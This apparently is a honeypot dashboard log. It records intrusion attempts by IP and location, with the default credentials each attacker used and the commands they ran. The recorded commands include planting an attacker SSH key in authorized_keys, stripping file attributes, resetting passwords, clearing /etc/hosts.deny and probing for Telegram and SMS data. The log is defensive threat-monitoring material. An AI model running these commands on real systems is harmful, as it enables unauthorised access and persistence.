$ arch_info=$(uname -m); cpu_count=$(nproc); echo -e "deploy\nuQNYIwkA\nuQNYIwkA" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPkcUOA/x/v3jySnP6HCyjn6QzKILlMl8zB3RKHiw0f14sRESr4SbI/Dp2SokPZxNBJwwa4MUa/hx5bTE/UqNU2+b6b+W+zR9YRl610TFE/mUaFiXgtnmQsrGG6zflB5JjxzWaHl3RRpHhaOe5GdPzf1OhXJv4mCt2VKwcLWIyRQxN3fsrrlCF2Sr3c0SjaYmhAnXtqmednQE+rw== server" > ${HOME}/.ssh/authorized_keys; chmod 600 ${HOME}/.ssh/authorized_keys >/dev/null 2>&1; chmod 700 ${HOME}/.ssh >/dev/null 2>&1; echo "$arch_info:$cpu_count"

↳ make executable (world)

$ arch_info=$(uname -m); cpu_count=$(nproc); echo -e "mysql\nxHIolkFc\nxHIolkFc" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPkcUOA/x/v3jySnP6HCyjn6QzKILlMl8zB3RKHiw0f14sRESr4SbI/Dp2SokPZxNBJwwa4MUa/hx5bTE/UqNU2+b6b+W+zR9YRl610TFE/mUaFiXgtnmQsrGG6zflB5JjxzWaHl3RRpHhaOe5GdPzf1OhXJv4mCt2VKwcLWIyRQxN3fsrrlCF2Sr3c0SjaYmhAnXtqmednQE+rw== server" > ${HOME}/.ssh/authorized_keys; chmod 600 ${HOME}/.ssh/authorized_keys >/dev/null 2>&1; chmod 700 ${HOME}/.ssh >/dev/null 2>&1; echo "$arch_info:$cpu_count"

↳ make executable (world)

🎭 lotus_root (35.200.201.144) — Mumbai, India · 35 sessions · 35 cmds

2026-03-23 00:03 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×35

🎭 phantom_root_43 (154.125.147.88) — Dakar, Senegal · 1 session · 2 cmds

2026-03-23 00:39 EDT · as oracle/Admin123

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 clog_root_2 (206.189.14.204) — Amsterdam, Netherlands · 4 sessions · 16 cmds

2026-03-23 00:18 EDT · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 samba_root_5 (177.157.203.75) — Barbacena, Brazil · 1 session · 2 cmds

2026-03-23 00:11 EDT · as oracle/Admin123

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 wok_root_32 (182.150.115.56) — Chengdu, China · 1 session · 2 cmds

2026-03-22 21:24 EDT · as oracle/admin123

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 specter_root_52 (101.32.128.193) — Singapore, Singapore · 1 session · 2 cmds

2026-03-22 21:08 EDT · as oracle/admin123

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 rogue_root_15 (83.168.110.33) — Warsaw, Poland · 13 sessions · 52 cmds

2026-03-22 19:28 EDT · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 13x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×13

$ uname -s -v -n -m 2 > /dev/null ×13

$ uname -m 2 > /dev/null ×13

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×13

🎭 acai_root_2 (189.34.96.69) — Cambé, Brazil · 1 session · 1 cmd

2026-03-22 20:15 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 lantern_root_25 (211.91.150.107) — Beijing, China · 1 session · 1 cmd

2026-03-22 19:41 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 cowboy_sol (45.33.68.211) — Cedar Knolls, United States · 24 sessions · 24 cmds

2026-03-22 18:25 EDT · as admin/admin, admin/admin123, deploy/deploy

Ran uname 24x across 24 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×24

🎭 bike_sol_3 (172.233.53.115) — Amsterdam, Netherlands · 24 sessions · 24 cmds

2026-03-22 17:15 EDT · as admin/admin, admin/admin123, deploy/deploy

Ran uname 24x across 24 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×24

🎭 cipher_root_6 (77.42.88.138) — Helsinki, Finland · 10 sessions · 10 cmds

2026-03-19 14:34 EDT · as root/1234, root/123456, root/12345678

hostname discovery → privilege check → history snooping → CPU profiling → OS/kernel identification

$ ps aux | head -10

$ ls -la /

$ pwd

$ hostname ×3

↳ hostname discovery

$ whoami

↳ privilege check

$ history | tail -5

↳ history snooping

$ cat /proc/cpuinfo | grep 'model name' | head -1

↳ CPU profiling

$ uname -a

↳ OS/kernel identification

🎭 panda_root_22 (14.103.170.189) — Haidian, China · 1 session · 1 cmd

2026-03-22 04:55 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 phantom_root (212.72.14.244) — Seeb, Oman · 35 sessions · 35 cmds

2026-03-21 14:29 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 56x across 56 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×35

🎭 k-pop_root_5 (121.165.84.80) — Seongnam-si, South Korea · 1 session · 9 cmds

2026-03-21 14:26 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 eagle_root_2 (185.106.96.111) — Los Angeles, United States · 1 session · 1 cmd

2026-03-21 14:14 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 liberty_root_2 (69.169.108.199) — Secaucus, United States · 35 sessions · 35 cmds

2026-03-20 22:55 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 35x across 35 sessions — automated OS fingerprinting.

$ uname -s -v -n -r-m ×35

🎭 liberty_root_16 (47.251.66.137) — Minkler, United States · 1 session · 1 cmd

2026-03-21 13:20 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 rogue_root_46 (101.47.76.57) — Hong Kong, Hong Kong · 1 session · 1 cmd

2026-03-21 10:54 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 phantom_root_44 (173.248.245.205) — Hong Kong, Hong Kong · 1 session · 1 cmd

2026-03-21 09:59 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 kiwi_root (134.199.168.158) — Sydney, Australia · 2 sessions · 8 cmds

2026-03-21 08:47 EDT · as root/123456, root/password

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 silk_root (124.163.255.210) — Linfen, China · 1 session · 20 cmds

2026-03-21 04:13 EDT · as test/test

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "test\n3b4xMM6nlDzk\n3b4xMM6nlDzk"|passwd|bash

$ Enter new UNIX password:

$ echo "test\n3b4xMM6nlDzk\n3b4xMM6nlDzk\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 wraith_root_47 (196.188.63.205) — Addis Ababa, Ethiopia · 1 session · 20 cmds

2026-03-21 04:04 EDT · as test/test

cd ~; chattr -ia .ssh; lockr -ia .ssh → cd ~ && rm -rf .ssh && mkdir .ssh → echo "ssh-rsa..." → cat /proc/cpuinfo | grep name | wc -l → echo "test\n8NzqXDswUVGa\n8NzqXDswUVGa"|passwd|bash → Enter new UNIX password

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "test\n8NzqXDswUVGa\n8NzqXDswUVGa"|passwd|bash

$ Enter new UNIX password:

$ echo "test\n8NzqXDswUVGa\n8NzqXDswUVGa\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 burger_sol_4 (172.174.109.244) — Boydton, United States · 7 sessions · 9 cmds

2026-03-20 22:26 EDT · as root/1234, root/12345678, root/admin

nproc → grep → hostname discovery → ls → uname → history snooping

$ nproc 2>/dev/null || (grep -c '^processor' /proc/cpuinfo 2>/dev/null) || echo 0 ×2

$ grep -c ^processor /proc/cpuinfo 2 > /dev/null ×2

$ hostname

↳ hostname discovery

$ ls -la /

$ uname -m 2>/dev/null || echo unknown ×2

$ history | tail -5

↳ history snooping

🎭 star_sol_5 (4.236.164.162) — Boydton, United States · 8 sessions · 8 cmds

2026-03-20 22:18 EDT · as root/1234, root/12345678, root/admin

hostname discovery → uptime check → privilege check → history snooping → OS/kernel identification → grep

$ hostname ×2

↳ hostname discovery

$ uptime ×2

↳ uptime check

$ whoami

↳ privilege check

$ history | tail -5

↳ history snooping

$ uname -a

↳ OS/kernel identification

$ grep 'model name' /proc/cpuinfo 2>/dev/null | head -1 | cut -d ':' -f2- | sed 's/^ *//' | xargs || echo unknown

🎭 dragon_root_21 (112.67.250.54) — Qiongshan, China · 2 sessions · 2 cmds

2026-03-21 01:18 EDT · as root/password

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -m ×2

🎭 yankee_root_3 (143.110.227.137) — Santa Clara, United States · 30 sessions · 120 cmds

2026-03-20 21:01 EDT · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 30x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×30

$ uname -s -v -n -m 2 > /dev/null ×30

$ uname -m 2 > /dev/null ×30

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×30

🎭 pretzel_root_13 (161.35.28.82) — Frankfurt am Main, Germany · 1 session · 4 cmds

2026-03-20 18:56 EDT · as root/root

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 bibimbap_root_5 (104.28.207.62) — Yanggok, South Korea · 1 session · 1 cmd

2026-03-20 18:26 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 tulip_root_13 (51.15.4.95) — Haarlem, Netherlands · 8 sessions · 32 cmds

2026-03-15 21:43 EDT · as admin/admin, admin/admin123, pi/raspberry

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 ghost_root_32 (165.154.22.233) — Hong Kong, Hong Kong · 1 session · 19 cmds

2026-03-20 15:27 EDT · as root/123456

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:S7r8fraFfRmO"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 cipher_root_71 (210.79.191.18) — Cicurug, Indonesia · 1 session · 19 cmds

2026-03-20 15:21 EDT · as root/123456

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

